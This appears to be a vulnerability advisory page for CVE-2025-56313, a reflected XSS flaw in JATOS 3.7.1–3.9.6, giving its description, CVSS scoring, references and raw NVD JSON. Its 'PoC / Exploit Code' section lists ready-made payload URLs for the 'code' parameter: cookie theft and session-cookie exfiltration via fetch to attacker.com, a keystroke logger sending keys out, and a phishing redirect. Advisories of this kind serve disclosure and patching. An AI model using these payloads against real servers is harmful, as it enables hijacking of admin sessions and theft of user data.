Security Vulnerability Report
CVE-2025-56313 CVSS 6.1 MEDIUM

CVE-2025-56313

Published: 2025-10-30 18:15:33
Last Modified: 2026-04-15 00:35:42

Description

A Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the /publix/run endpoint of JATOS 3.7.1 through 3.9.6 (inclusive). This allows remote attackers to execute arbitrary JavaScript in a user's web browser by including a malicious payload in the "code" URL parameter. When an authenticated admin user accesses the study's URL, the malicious script gets interpreted and executes within their browser, which can lead to unauthorized actions, account compromise, and privilege escalation.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

JATOS >= 3.7.1 and <= 3.9.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-56313 PoC - JATOS Reflected XSS -->
<!-- Target: JATOS 3.7.1 - 3.9.6 -->
<!-- Endpoint: /publix/run -->
<!-- Parameter: code -->

<!-- Basic XSS PoC -->
https://target-jatos-server/publix/run?code=<script>alert('XSS')</script>

<!-- Cookie Stealing PoC -->
https://target-jatos-server/publix/run?code=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

<!-- Session Hijacking PoC -->
https://target-jatos-server/publix/run?code=<img src=x onerror="fetch('https://attacker.com/log?cookie='+btoa(document.cookie))">

<!-- Keylogger PoC -->
https://target-jatos-server/publix/run?code=<script>document.onkeypress=function(e){fetch('https://attacker.com/k?k='+e.key)}</script>

<!-- Phishing Redirect PoC -->
https://target-jatos-server/publix/run?code=<script>window.location='https://attacker.com/phishing'</script>

References

https://github.com/JATOS/JATOS
https://medium.com/@ruizramisdaniel/cve-2025-56313-jatos-v3-9-6-reflected-xss-in-study-links-af1305ae09d0

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56313", "sourceIdentifier": "[email protected]", "published": "2025-10-30T18:15:32.667", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the /publix/run endpoint of JATOS 3.7.1 through 3.9.6 (inclusive). This allows remote attackers to execute arbitrary JavaScript in a user's web browser by including a malicious payload in the \"code\" URL parameter. When an authenticated admin user accesses the study's URL, the malicious script gets interpreted and executes within their browser, which can lead to unauthorized actions, account compromise, and privilege escalation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/JATOS/JATOS", "source": "[email protected]"}, {"url": "https://medium.com/@ruizramisdaniel/cve-2025-56313-jatos-v3-9-6-reflected-xss-in-study-links-af1305ae09d0", "source": "[email protected]"}, {"url": "https://medium.com/@ruizramisdaniel/cve-2025-56313-jatos-v3-9-6-reflected-xss-in-study-links-af1305ae09d0", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}